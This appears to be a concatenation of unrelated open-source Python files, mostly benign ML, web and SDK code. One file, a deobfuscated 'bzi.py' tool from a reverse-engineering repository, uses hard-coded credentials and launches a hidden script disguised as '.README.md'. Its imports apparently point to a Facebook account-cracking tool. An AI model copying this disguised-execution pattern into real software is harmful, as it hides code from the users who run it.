def test_error_raised_wrong_cities(base_problem):
# we want an error if we see too many cities
with pytest.raises(ValueError) as execinfo1:
base_problem.eval_function([[0, 1, 2, 3]])
assert "Extra: {3}" in str(execinfo1.value)
# we want an error if we see too few cities
with pytest.raises(ValueError) as execinfo2:
base_problem.eval_function([[0, 2]])
assert "Missing: {1}" in str(execinfo2.value)
# we want an error if we see multiple occurences of cities
with pytest.raises(ValueError) as execinfo3:
base_problem.eval_function([[0, 2], [0, 1]])
assert "Multiple occurrences found for cities: {0}" in str(execinfo3.value)
def test_base_score_method(base_problem):
assert base_problem.distance((0, 0), (0, 2)) == 2
expected = 1 + math.sqrt(2) + 1 + math.sqrt(2)
assert base_problem.eval_function([[0, 1, 2]]) == pytest.approx(expected)
assert base_problem.eval_function([[2, 1, 0]]) == pytest.approx(expected)
base_problem.sleigh_weight = 2
assert base_problem.eval_function([[2, 1, 0]]) == pytest.approx(2*expected)
def test_sleight_gift_weights(adv_problem):
expected = (2+7) + (2+2) + (2+1) + (2+0)
assert adv_problem.eval_function([[0, 1, 2]]) == pytest.approx(expected)
def test_multiple_routes(adv_problem):
expected = (2 + 6) + (2 + 1) + math.sqrt(2)*(2 + 0) + (2 + 1) + (2 + 0)
assert adv_problem.eval_function([[0, 1], [2]]) == pytest.approx(expected)
|
inpainting/models/utils.py | m-svo/video-object-removal | 2,462 | 11188302 | import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.backends import cudnn
from random import *
import numpy as np
import matplotlib.pyplot as plt
import torch.nn.functional as F
def down_sample(x, size=None, scale_factor=None, mode='nearest'):
# define size if user has specified scale_factor
if size is None: size = (int(scale_factor*x.size(2)), int(scale_factor*x.size(3)))
# create coordinates
h = torch.arange(0,size[0]) / (size[0]-1) * 2 - 1
w = torch.arange(0,size[1]) / (size[1]-1) * 2 - 1
# create grid
grid =torch.zeros(size[0],size[1],2)
grid[:,:,0] = w.unsqueeze(0).repeat(size[0],1)
grid[:,:,1] = h.unsqueeze(0).repeat(size[1],1).transpose(0,1)
# expand to match batch size
grid = grid.unsqueeze(0).repeat(x.size(0),1,1,1)
if x.is_cuda: grid = Variable(grid).cuda()
# do sampling
return F.grid_sample(x, grid, mode=mode)
def reduce_mean(x):
for i in range(4):
if i==1: continue
x = torch.mean(x, dim=i, keepdim=True)
return x
def l2_norm(x):
def reduce_sum(x):
for i in range(4):
if i==1: continue
x = torch.sum(x, dim=i, keepdim=True)
return x
x = x**2
x = reduce_sum(x)
return torch.sqrt(x)
def show_image(real, masked, stage_1, stage_2, fake, offset_flow):
batch_size = real.shape[0]
(real, masked, stage_1, stage_2, fake, offset_flow) = (
var_to_numpy(real),
var_to_numpy(masked),
var_to_numpy(stage_1),
var_to_numpy(stage_2),
var_to_numpy(fake),
var_to_numpy(offset_flow)
)
# offset_flow = (offset_flow*2).astype(int) -1
for x in range(batch_size):
if x > 5 :
break
fig, axs = plt.subplots(ncols=5, figsize=(15,3))
axs[0].set_title('real image')
axs[0].imshow(real[x])
axs[0].axis('off')
axs[1].set_title('masked image')
axs[1].imshow(masked[x])
axs[1].axis('off')
axs[2].set_title('stage_1 image')
axs[2].imshow(stage_1[x])
axs[2].axis('off')
axs[3].set_title('stage_2 image')
axs[3].imshow(stage_2[x])
axs[3].axis('off')
axs[4].set_title('fake_image')
axs[4].imshow(fake[x])
axs[4].axis('off')
# axs[5].set_title('C_Attn')
# axs[5].imshow(offset_flow[x])
# axs[5].axis('off')
plt.show()
def var_to_numpy(obj, for_vis=True):
if for_vis:
obj = obj.permute(0,2,3,1)
obj = (obj+1) / 2
return obj.data.cpu().numpy()
def to_var(x, volatile=False):
if torch.cuda.is_available():
x = x.cuda()
    return Variable(x, volatile=volatile)
|
walrus/counter.py | pavel-francirek/walrus | 1,039 | 11188337 | <filename>walrus/counter.py
class Counter(object):
"""
Simple counter.
"""
def __init__(self, database, name):
"""
:param database: A walrus ``Database`` instance.
:param str name: The name for the counter.
"""
self.database = database
self.name = name
self.key = 'counter:%s' % self.name
if self.key not in self.database:
self.database[self.key] = 0
def decr(self, decr_by=1):
return self.database.decr(self.key, decr_by)
def incr(self, incr_by=1):
return self.database.incr(self.key, incr_by)
def value(self):
return int(self.database[self.key])
def _op(self, method, other):
if isinstance(other, Counter):
other = other.value()
if not isinstance(other, int):
raise TypeError('Cannot add %s, not an integer.' % other)
method(other)
return self
def __iadd__(self, other):
return self._op(self.incr, other)
def __isub__(self, other):
return self._op(self.decr, other)
__add__ = __iadd__
__sub__ = __isub__
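# Editor's sketch (not in the original module): exercising Counter against a
# local Redis through walrus.Database(). Assumes a Redis server is reachable
# on localhost:6379.
if __name__ == '__main__':
    from walrus import Database
    db = Database()                       # defaults to localhost:6379
    hits = Counter(db, 'example-hits')
    hits += 5
    hits -= 2
    print(hits.value())                   # 3, plus whatever was stored before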
|
z3/get.py | ElvisTheKing/z3 | 287 | 11188369 | import argparse
import sys
import re
import boto3
import botocore
from boto3.s3.transfer import TransferConfig
from z3.config import get_config
MB = 1024 ** 2
def main():
cfg = get_config()
parser = argparse.ArgumentParser(
description='Read a key from s3 and write the content to stdout',
)
parser.add_argument('name', help='name of S3 key')
args = parser.parse_args()
extra_config = {}
if 'HOST' in cfg:
extra_config['endpoint_url'] = cfg['HOST']
config = TransferConfig(max_concurrency=int(cfg['CONCURRENCY']), multipart_chunksize=int(re.sub('M', '', cfg['CHUNK_SIZE'])) * MB)
if 'S3_KEY_ID' in cfg:
s3 = boto3.client('s3', aws_access_key_id=cfg['S3_KEY_ID'], aws_secret_access_key=cfg['S3_SECRET'], **extra_config)
else:
s3 = boto3.client('s3', **extra_config)
try:
s3.download_fileobj(cfg['BUCKET'], args.name, sys.stdout, Config=config)
except botocore.exceptions.ClientError as e:
if e.response['Error']['Code'] == "404":
print("The object does not exist.")
else:
raise
if __name__ == '__main__':
main()
|
speech_recognition/rnnt/pytorch/dataset.py | CaoZhongZ/inference | 388 | 11188376 | <filename>speech_recognition/rnnt/pytorch/dataset.py
# Copyright (c) 2019, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This file contains classes and functions related to data loading
"""
from collections import namedtuple
import torch
import numpy as np
from torch.utils.data import Dataset
from parts.manifest import Manifest
from parts.features import WaveformFeaturizer
def seq_collate_fn(batch):
"""batches samples and returns as tensors
Args:
batch : list of samples
Returns
batches of tensors
"""
audio_lengths = torch.LongTensor([sample.waveform.size(0)
for sample in batch])
transcript_lengths = torch.LongTensor([sample.transcript.size(0)
for sample in batch])
permute_indices = torch.argsort(audio_lengths, descending=True)
audio_lengths = audio_lengths[permute_indices]
transcript_lengths = transcript_lengths[permute_indices]
padded_audio_signals = torch.nn.utils.rnn.pad_sequence(
[batch[i].waveform for i in permute_indices],
batch_first=True
)
transcript_list = [batch[i].transcript
for i in permute_indices]
packed_transcripts = torch.nn.utils.rnn.pack_sequence(transcript_list,
enforce_sorted=False)
# TODO: Don't I need to stop grad at some point now?
return (padded_audio_signals, audio_lengths, transcript_list,
packed_transcripts, transcript_lengths)
class AudioToTextDataLayer:
"""Data layer with data loader
"""
def __init__(self, **kwargs):
featurizer_config = kwargs['featurizer_config']
pad_to_max = kwargs.get('pad_to_max', False)
perturb_config = kwargs.get('perturb_config', None)
manifest_filepath = kwargs['manifest_filepath']
dataset_dir = kwargs['dataset_dir']
labels = kwargs['labels']
batch_size = kwargs['batch_size']
drop_last = kwargs.get('drop_last', False)
shuffle = kwargs.get('shuffle', True)
min_duration = featurizer_config.get('min_duration', 0.1)
max_duration = featurizer_config.get('max_duration', None)
normalize_transcripts = kwargs.get('normalize_transcripts', True)
trim_silence = kwargs.get('trim_silence', False)
sampler_type = kwargs.get('sampler', 'default')
speed_perturbation = featurizer_config.get('speed_perturbation', False)
sort_by_duration = sampler_type == 'bucket'
self._featurizer = WaveformFeaturizer.from_config(
featurizer_config, perturbation_configs=perturb_config)
self._dataset = AudioDataset(
dataset_dir=dataset_dir,
manifest_filepath=manifest_filepath,
labels=labels, blank_index=len(labels),
sort_by_duration=sort_by_duration,
pad_to_max=pad_to_max,
featurizer=self._featurizer, max_duration=max_duration,
min_duration=min_duration, normalize=normalize_transcripts,
trim=trim_silence, speed_perturbation=speed_perturbation)
print('sort_by_duration', sort_by_duration)
self._dataloader = torch.utils.data.DataLoader(
dataset=self._dataset,
batch_size=batch_size,
collate_fn=lambda b: seq_collate_fn(b),
drop_last=drop_last,
shuffle=shuffle,
num_workers=0,
pin_memory=True,
sampler=None
)
def __len__(self):
return len(self._dataset)
@property
def data_iterator(self):
return self._dataloader
class AudioDataset(Dataset):
def __init__(self, dataset_dir, manifest_filepath, labels, featurizer, max_duration=None, pad_to_max=False,
min_duration=None, blank_index=0, max_utts=0, normalize=True, sort_by_duration=False,
trim=False, speed_perturbation=False):
"""Dataset that loads tensors via a json file containing paths to audio files, transcripts, and durations
(in seconds). Each entry is a different audio sample.
Args:
dataset_dir: absolute path to dataset folder
manifest_filepath: relative path from dataset folder to manifest json as described above.
labels: String containing all the possible characters to map to
featurizer: Initialized featurizer class that converts paths of audio to feature tensors
max_duration: If audio exceeds this length, do not include in dataset
min_duration: If audio is less than this length, do not include in dataset
            pad_to_max: if specified, input sequences fed into the DNN model will be padded to max_duration
blank_index: blank index for ctc loss / decoder
max_utts: Limit number of utterances
normalize: whether to normalize transcript text
sort_by_duration: whether or not to sort sequences by increasing duration
trim: if specified trims leading and trailing silence from an audio signal.
            speed_perturbation: specify whether the data contains speed perturbation
"""
m_paths = [manifest_filepath]
self.manifest = Manifest(dataset_dir, m_paths, labels, blank_index, pad_to_max=pad_to_max,
max_duration=max_duration,
sort_by_duration=sort_by_duration,
min_duration=min_duration, max_utts=max_utts,
normalize=normalize, speed_perturbation=speed_perturbation)
self.featurizer = featurizer
self.blank_index = blank_index
self.trim = trim
print(
"Dataset loaded with {0:.2f} hours. Filtered {1:.2f} hours.".format(
self.manifest.duration / 3600,
self.manifest.filtered_duration / 3600))
def __getitem__(self, index):
sample = self.manifest[index]
rn_indx = np.random.randint(len(sample['audio_filepath']))
duration = sample['audio_duration'][rn_indx] if 'audio_duration' in sample else 0
offset = sample['offset'] if 'offset' in sample else 0
features = self.featurizer.process(sample['audio_filepath'][rn_indx],
offset=offset, duration=duration,
trim=self.trim)
AudioSample = namedtuple('AudioSample', ['waveform',
'transcript'])
return AudioSample(features,
torch.LongTensor(sample["transcript"]))
def __len__(self):
return len(self.manifest)
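# Minimal usage sketch (hypothetical values; in this repo the featurizer config and
# label list are parsed from the model configuration file):
#
#   data_layer = AudioToTextDataLayer(
#       featurizer_config=featurizer_config,   # dict with sample rate, window size, ...
#       manifest_filepath='librispeech-dev-clean-wav.json',
#       dataset_dir='/datasets/LibriSpeech',
#       labels=labels,                         # list of output characters
#       batch_size=16,
#       shuffle=False)
#   for (padded_audio, audio_lens, transcripts,
#        packed_transcripts, transcript_lens) in data_layer.data_iterator:
#       ...                                    # feed the batch to the RNN-T model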
|
pi3d/util/PostProcess.py | helgeerbe/pi3d | 177 | 11188378 | import ctypes
from pi3d.constants import (opengles, GL_SCISSOR_TEST, GLint, GLsizei, GL_RGBA,
GLubyte, GL_UNSIGNED_BYTE)
from pi3d.Shader import Shader
from pi3d.Camera import Camera
from pi3d.shape.LodSprite import LodSprite
from pi3d.util.OffScreenTexture import OffScreenTexture
class PostProcess(OffScreenTexture):
"""For creating a an offscreen texture that can be redrawn using shaders
as required by the developer"""
def __init__(self, shader="post_base", mipmap=False, add_tex=None,
scale=1.0, camera=None, divide=1):
""" calls Texture.__init__ but doesn't need to set file name as
texture generated from the framebuffer. Keyword Arguments:
*shader*
to use when drawing sprite, defaults to post_base, a simple
3x3 convolution that does basic edge detection. Can be copied to
project directory and modified as required.
*mipmap*
can be set to True with slight cost to speed, or use fxaa shader
*add_tex*
list of textures. If additional textures can be used by the shader
then they can be added here.
*scale*
will only render this proportion of the full screen which will
then be mapped to the full uv of the Sprite. The camera object
passed (below) will need to have the same scale set to avoid
perspective distortion
*camera*
the camera to use for rendering to the offscreen texture
*divide*
allow the sprite to be created with intermediate vertices to allow
interesting vertex shader effects
"""
super(PostProcess, self).__init__("postprocess")
self.scale = scale
# load shader
if type(shader) == Shader:
self.shader = shader
else:
self.shader = Shader.create(shader)
if camera is None:
self.viewcam = Camera.instance() # in case this is prior to one being created
else:
self.viewcam = camera
self.camera = Camera(is_3d=False)
self.sprite = LodSprite(camera=self.camera, z=20.0, w=self.ix, h=self.iy, n=divide)
self.sprite.set_2d_size(w=self.ix, h=self.iy)
self.tex_list = [self.color, self.depth] # TODO check if this self reference causes graphics memory leaks
if add_tex:
self.tex_list.extend(add_tex)
self.sprite.set_draw_details(self.shader, self.tex_list, 0.0, 0.0)
for b in self.sprite.buf:
b.unib[6] = self.scale # ufact
b.unib[7] = self.scale # vfact
b.unib[9] = (1.0 - self.scale) * 0.5 # uoffset
b.unib[10] = (1.0 - self.scale) * 0.5 # voffset
self.blend = True
self.mipmap = mipmap
def start_capture(self, clear=True):
""" after calling this method all object.draw()s will rendered
to this texture and not appear on the display. Large objects
will obviously take a while to draw and re-draw
"""
super(PostProcess, self)._start(clear=clear)
from pi3d.Display import Display
xx = int(Display.INSTANCE.width / 2.0 * (1.0 - self.scale)) - 1
yy = int(Display.INSTANCE.height / 2.0 * (1.0 - self.scale)) - 1
ww = int(Display.INSTANCE.width * self.scale) + 2
hh = int(Display.INSTANCE.height * self.scale) + 2
opengles.glEnable(GL_SCISSOR_TEST)
opengles.glScissor(GLint(xx), GLint(yy), GLsizei(ww), GLsizei(hh))
def end_capture(self):
""" stop capturing to texture and resume normal rendering to default
"""
super(PostProcess, self)._end()
opengles.glDisable(GL_SCISSOR_TEST)
def draw(self, unif_vals=None):
""" draw the shape using the saved texture
Keyword Argument:
*unif_vals*
        dictionary object i.e. {a:unif[a], b:unif[b], c:unif[c]} where a,b,c
are subscripts of the unif array in Shape available for user
custom space i.e. unif[48]...unif[59] corresponding with the vec3
uniform variables unif[16][0] to unif[19][2]
NB the values must be three value tuples or 1D arrays
"""
if unif_vals:
for i in unif_vals:
self.sprite.unif[i] = unif_vals[i]
self.sprite.draw()
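# Typical usage sketch (assumes an existing pi3d Display and at least one drawable
# Shape; the names are illustrative only):
#
#   post = PostProcess()            # default "post_base" shader
#   while DISPLAY.loop_running():
#     post.start_capture()
#     my_shape.draw()               # drawn to the offscreen texture
#     post.end_capture()
#     post.draw()                   # re-drawn through the post-processing shader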
|
routes/api.py | RobbiNespu/forget | 157 | 11188412 | <gh_stars>100-1000
from app import app, db, imgproxy
from libforget.auth import require_auth_api, get_viewer
from flask import jsonify, redirect, make_response, request, Response
from model import Account
import libforget.settings
import libforget.json
import random
@app.route('/api/health_check') # deprecated 2021-03-12
@app.route('/api/status_check')
def api_status_check():
try:
db.session.execute('SELECT 1')
except Exception:
return ('PostgreSQL bad', 500)
try:
imgproxy.redis.set('forget-status-check', 'howdy', ex=5)
except Exception:
return ('Redis bad', 500)
return 'OK'
@app.route('/api/settings', methods=('PUT',))
@require_auth_api
def api_settings_put():
viewer = get_viewer()
data = request.json
updated = dict()
for key in libforget.settings.attrs:
if key in data:
if (
isinstance(getattr(viewer, key), bool) and
isinstance(data[key], str)):
data[key] = data[key] == 'true'
setattr(viewer, key, data[key])
updated[key] = data[key]
db.session.commit()
return jsonify(status='success', updated=updated)
@app.route('/api/viewer')
@require_auth_api
def api_viewer():
viewer = get_viewer()
resp = make_response(libforget.json.account(viewer))
resp.headers.set('content-type', 'application/json')
return resp
@app.route('/api/reason', methods={'DELETE'})
@require_auth_api
def delete_reason():
get_viewer().reason = None
db.session.commit()
return jsonify(status='success')
@app.route('/api/badge/users')
def users_badge():
count = (
Account.query.filter(Account.policy_enabled)
.filter(~Account.dormant)
.count()
)
return redirect(
"https://img.shields.io/badge/active%20users-{}-blue.svg"
.format(count))
@app.route('/api/known_instances', methods=('GET', 'DELETE'))
def known_instances():
if request.method == 'GET':
known = request.cookies.get('forget_known_instances', '')
if not known:
return Response('[]', 404, mimetype='application/json')
# pad to avoid oracle attacks
for _ in range(random.randint(0, 1000)):
known += random.choice((' ', '\t', '\n'))
return Response(known, mimetype='application/json')
elif request.method == 'DELETE':
resp = Response('', 204)
resp.set_cookie('forget_known_instances', '', max_age=0)
return resp
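# Example (sketch): with the app served locally, the status check above can be probed
# with something like
#   curl -f http://localhost:5000/api/status_check
# which returns "OK" only when both PostgreSQL and Redis respond.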
|
tencentcloud/ams/v20201229/errorcodes.py | PlasticMem/tencentcloud-sdk-python | 465 | 11188465 | <reponame>PlasticMem/tencentcloud-sdk-python
# -*- coding: utf8 -*-
# Copyright (c) 2017-2021 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# DryRun operation, meaning the request would have succeeded, but the DryRun parameter was passed.
DRYRUNOPERATION = 'DryRunOperation'
# Operation failed.
FAILEDOPERATION = 'FailedOperation'
# Internal error.
INTERNALERROR = 'InternalError'
# InternalError.InternalError
INTERNALERROR_INTERNALERROR = 'InternalError.InternalError'
# Parameter error.
INVALIDPARAMETER = 'InvalidParameter'
# InvalidParameter.ImageSizeTooSmall
INVALIDPARAMETER_IMAGESIZETOOSMALL = 'InvalidParameter.ImageSizeTooSmall'
# InvalidParameter.InvalidImageContent
INVALIDPARAMETER_INVALIDIMAGECONTENT = 'InvalidParameter.InvalidImageContent'
# InvalidParameter.ParameterError
INVALIDPARAMETER_PARAMETERERROR = 'InvalidParameter.ParameterError'
# Invalid parameter value.
INVALIDPARAMETERVALUE = 'InvalidParameterValue'
# InvalidParameterValue.EmptyImageContent
INVALIDPARAMETERVALUE_EMPTYIMAGECONTENT = 'InvalidParameterValue.EmptyImageContent'
# InvalidParameterValue.ImageSizeTooSmall
INVALIDPARAMETERVALUE_IMAGESIZETOOSMALL = 'InvalidParameterValue.ImageSizeTooSmall'
# InvalidParameterValue.InvalidContent
INVALIDPARAMETERVALUE_INVALIDCONTENT = 'InvalidParameterValue.InvalidContent'
# InvalidParameterValue.InvalidDataId
INVALIDPARAMETERVALUE_INVALIDDATAID = 'InvalidParameterValue.InvalidDataId'
# InvalidParameterValue.InvalidFileContentSize
INVALIDPARAMETERVALUE_INVALIDFILECONTENTSIZE = 'InvalidParameterValue.InvalidFileContentSize'
# InvalidParameterValue.InvalidImageContent
INVALIDPARAMETERVALUE_INVALIDIMAGECONTENT = 'InvalidParameterValue.InvalidImageContent'
# InvalidParameterValue.InvalidParameter
INVALIDPARAMETERVALUE_INVALIDPARAMETER = 'InvalidParameterValue.InvalidParameter'
# Quota limit exceeded.
LIMITEXCEEDED = 'LimitExceeded'
# Missing parameter error.
MISSINGPARAMETER = 'MissingParameter'
# Operation denied.
OPERATIONDENIED = 'OperationDenied'
# The number of requests exceeds the rate limit.
REQUESTLIMITEXCEEDED = 'RequestLimitExceeded'
# The resource is in use.
RESOURCEINUSE = 'ResourceInUse'
# Insufficient resources.
RESOURCEINSUFFICIENT = 'ResourceInsufficient'
# The resource does not exist.
RESOURCENOTFOUND = 'ResourceNotFound'
# The resource is unavailable.
RESOURCEUNAVAILABLE = 'ResourceUnavailable'
# ResourceUnavailable.InvalidImageContent
RESOURCEUNAVAILABLE_INVALIDIMAGECONTENT = 'ResourceUnavailable.InvalidImageContent'
# Resources are sold out.
RESOURCESSOLDOUT = 'ResourcesSoldOut'
# Unauthorized operation.
UNAUTHORIZEDOPERATION = 'UnauthorizedOperation'
# Unknown parameter error.
UNKNOWNPARAMETER = 'UnknownParameter'
# Unsupported operation.
UNSUPPORTEDOPERATION = 'UnsupportedOperation'
|
homeassistant/components/motioneye/sensor.py | MrDelik/core | 30,023 | 11188473 | <reponame>MrDelik/core<gh_stars>1000+
"""Sensor platform for motionEye."""
from __future__ import annotations
import logging
from types import MappingProxyType
from typing import Any
from motioneye_client.client import MotionEyeClient
from motioneye_client.const import KEY_ACTIONS, KEY_NAME
from homeassistant.components.sensor import SensorEntity, SensorEntityDescription
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import StateType
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
from . import MotionEyeEntity, get_camera_from_cameras, listen_for_new_cameras
from .const import CONF_CLIENT, CONF_COORDINATOR, DOMAIN, TYPE_MOTIONEYE_ACTION_SENSOR
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up motionEye from a config entry."""
entry_data = hass.data[DOMAIN][entry.entry_id]
@callback
def camera_add(camera: dict[str, Any]) -> None:
"""Add a new motionEye camera."""
async_add_entities(
[
MotionEyeActionSensor(
entry.entry_id,
camera,
entry_data[CONF_CLIENT],
entry_data[CONF_COORDINATOR],
entry.options,
)
]
)
listen_for_new_cameras(hass, entry, camera_add)
class MotionEyeActionSensor(MotionEyeEntity, SensorEntity):
"""motionEye action sensor camera."""
def __init__(
self,
config_entry_id: str,
camera: dict[str, Any],
client: MotionEyeClient,
coordinator: DataUpdateCoordinator,
options: MappingProxyType[str, str],
) -> None:
"""Initialize an action sensor."""
super().__init__(
config_entry_id,
TYPE_MOTIONEYE_ACTION_SENSOR,
camera,
client,
coordinator,
options,
SensorEntityDescription(
key=TYPE_MOTIONEYE_ACTION_SENSOR, entity_registry_enabled_default=False
),
)
@property
def name(self) -> str:
"""Return the name of the sensor."""
camera_prepend = f"{self._camera[KEY_NAME]} " if self._camera else ""
return f"{camera_prepend}Actions"
@property
def native_value(self) -> StateType:
"""Return the value reported by the sensor."""
return len(self._camera.get(KEY_ACTIONS, [])) if self._camera else 0
@property
def extra_state_attributes(self) -> dict[str, Any] | None:
"""Add actions as attribute."""
if actions := (self._camera.get(KEY_ACTIONS) if self._camera else None):
return {KEY_ACTIONS: actions}
return None
@callback
def _handle_coordinator_update(self) -> None:
"""Handle updated data from the coordinator."""
self._camera = get_camera_from_cameras(self._camera_id, self.coordinator.data)
super()._handle_coordinator_update()
|
bzi/dec/bzi.py | shyamjangid07/Reverse-Engineering | 337 | 11188485 | # Deobfuscated BY HTR-TECH | <NAME>
# Github : https://github.com/htr-tech
# Instagram : https://www.instagram.com/tahmid.rayat
# Facebook : https://fb.com/tahmid.rayat.oficial
# Messenger : https://m.me/tahmid.rayat.oficial
try:
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass,mechanize,requests,bzin
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
except ImportError:
os.system('pip2 install requests')
os.system('pip2 install mechanize')
os.system("pip2 install bzin")
time.sleep(1)
os.system('python2 bzi.py')
os.system("clear")
##### LOGO #####
logo='''
______ _______ _________
( ___ \ / ___ )\__ __/
| ( ) )\/ ) | ) (
| (__/ / / ) | |
| __ ( / / | |
| ( \ \ / / | |
| )___) ) / (_/\___) (___
|/ \___/ (_______/\_______/
--------------------------------------------------
Auther : Binyamin
GitHub : https://github.com/binyamin-binni
YouTube : Trick Proof
Blogspot : https://trickproof.blogspot.com
--------------------------------------------------
'''
cusr = "binyamin"
cpwd = "bzi"
def u():
os.system("clear")
print(logo)
usr=raw_input(" TOOL USERNAME : ")
if usr == cusr:
p()
else:
os.system("clear")
print(logo)
print(" TOOL USERNAME : "+usr+" (wrong)")
time.sleep(1)
os.system('xdg-open https://trickproof.blogspot.com/2020/04/new-termux-commands-for-fb.html')
u()
def p():
os.system("clear")
print(logo)
print(" TOOL USERNAME : binyamin (correct)")
pwd=raw_input(" TOOL PASSWORD : ")
if pwd == cpwd:
z()
else:
os.system("clear")
print(logo)
print(" TOOL USERNAME : binyamin (correct)")
print(" TOOL PASSWORD : "+pwd+" (wrong)")
time.sleep(1)
os.system('xdg-open https://trickproof.blogspot.com/2020/04/new-termux-commands-for-fb.html')
p()
def z():
os.system("clear")
print(logo)
print(" TOOL USERNAME : binyamin (correct)")
print(" TOOL PASSWORD : <PASSWORD> (correct)")
time.sleep(1)
os.system("python2 .README.md")
if __name__=="__main__":
u()
|
socket__tcp__examples/hello_world__with_RSA_AES__commands_in_JSON__client=public_and_server=private/utils.py | DazEB2/SimplePyScripts | 117 | 11188518 | <reponame>DazEB2/SimplePyScripts
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import enum
class CommandEnum(enum.Enum):
CURRENT_DATETIME = enum.auto()
CURRENT_TIMESTAMP = enum.auto()
RANDOM = enum.auto()
GUID = enum.auto()
FILE_NAME_PUBLIC_KEY = 'keys/public.pem'
FILE_NAME_PRIVATE_KEY = 'keys/private.pem'
if __name__ == '__main__':
print(CommandEnum)
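# Sketch of how a command might travel as JSON between the client and server scripts
# of this example (the exact wire format lives in those scripts; this only shows the idea):
#   import json
#   payload = json.dumps({'command': CommandEnum.GUID.name})
#   command = CommandEnum[json.loads(payload)['command']]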
|
platypush/backend/http/app/routes/plugins/qrcode/__init__.py | RichardChiang/platypush | 228 | 11188536 | <gh_stars>100-1000
import base64
from flask import abort, request, Blueprint, Response
from platypush.backend.http.app import template_folder
from platypush.context import get_plugin
qrcode = Blueprint('qrcode', __name__, template_folder=template_folder)
# Declare routes list
__routes__ = [
qrcode,
]
@qrcode.route('/qrcode', methods=['GET'])
def generate_code():
"""
This route can be used to generate a QR code given a ``content`` parameter.
"""
from platypush.plugins.qrcode import QrcodePlugin
content = request.args.get('content')
if not content:
        abort(400, 'Expected content parameter')
plugin: QrcodePlugin = get_plugin('qrcode')
response = plugin.generate(content, format='png').output
data = base64.decodebytes(response['data'].encode())
return Response(data, mimetype='image/png')
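# Example request (sketch): with the platypush HTTP backend running on its default
# port, something like
#   curl -o code.png 'http://localhost:8008/qrcode?content=hello'
# should come back with the generated PNG.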
# vim:sw=4:ts=4:et:
|
applications/pytorch/bert/tests/accuracy_test.py | payoto/graphcore_examples | 260 | 11188569 | <reponame>payoto/graphcore_examples
# Copyright (c) 2021 Graphcore Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
from modeling import accuracy, accuracy_masked
def test_accuracy():
pred = torch.tensor(
[[1.0, 2.0, 5.0],
[5.0, 2.0, 1.0],
[2.0, 5.0, 1.0],
[2.0, 1.0, 5.0]]
)
# test all right = 100% accuracy
labels = torch.tensor([2, 0, 1, 2])
assert accuracy(pred, labels) == 1.0
# test all wrong = 0% accuracy
labels = torch.tensor([0, 1, 0, 0])
assert accuracy(pred, labels) == 0.0
# test 50% right
labels = torch.tensor([2, 1, 1, 0])
assert accuracy(pred, labels) == 0.5
def test_accuracy_masked():
ignore_token = -100
# prediction tensor dimensions:
# [bs, seq_len, vocab_size]
pred = torch.tensor(
[
[[1.0, 2.0, 5.0],
[5.0, 2.0, 1.0]],
[[2.0, 5.0, 1.0],
[2.0, 1.0, 5.0]]
]
)
# label tensor dimensions:
# [bs, seq_len]
labels = torch.tensor(
[[2, 0], [1, 2]]
)
# No mask with 100% correct
assert accuracy_masked(pred, labels, ignore_token) == 1.0
# No mask with 0% correct
labels = torch.tensor(
[[1, 2], [0, 1]]
)
assert accuracy_masked(pred, labels, ignore_token) == 0.0
# with 1 mask token per sequence with 100% correct
labels = torch.tensor(
[[ignore_token, 0], [1, ignore_token]]
)
assert accuracy_masked(pred, labels, ignore_token) == 1.0
# with 1 mask token per sequence with 0% correct
labels = torch.tensor(
[[ignore_token, 2], [0, ignore_token]]
)
assert accuracy_masked(pred, labels, ignore_token) == 0.0
# with 1 mask token per sequence with 50% correct
labels = torch.tensor(
[[ignore_token, 2], [1, ignore_token]]
)
assert accuracy_masked(pred, labels, ignore_token) == 0.5
# with only mask tokens should be nan
labels = torch.tensor(
[[ignore_token, ignore_token], [ignore_token, ignore_token]]
)
assert accuracy_masked(pred, labels, ignore_token).isnan()
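# For reference, a minimal implementation consistent with the tests above could look
# like the functions below. These are NOT the project's modeling.accuracy /
# accuracy_masked, just a sketch of the behaviour the tests expect.
def _reference_accuracy(pred, labels):
    # fraction of positions whose argmax over the class dimension matches the label
    return (pred.argmax(dim=-1) == labels).float().mean()


def _reference_accuracy_masked(pred, labels, ignore_token):
    # same as above, but positions labelled with ignore_token are excluded;
    # returns nan when every position is masked (0 / 0)
    mask = labels != ignore_token
    correct = (pred.argmax(dim=-1) == labels) & mask
    return correct.sum().float() / mask.sum().float()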
|
Algebraic-Diagrammatic-Construction/IP_EA_ADC2.py | andyj10224/psi4numpy | 214 | 11188611 | <reponame>andyj10224/psi4numpy
'''
A reference implementation of ADC(2) for the calculation of ionization
potentials and electron affinities for a restricted Hartree-Fock
reference. A spin orbital formulation is used, as it simplifies the
equations.
References:
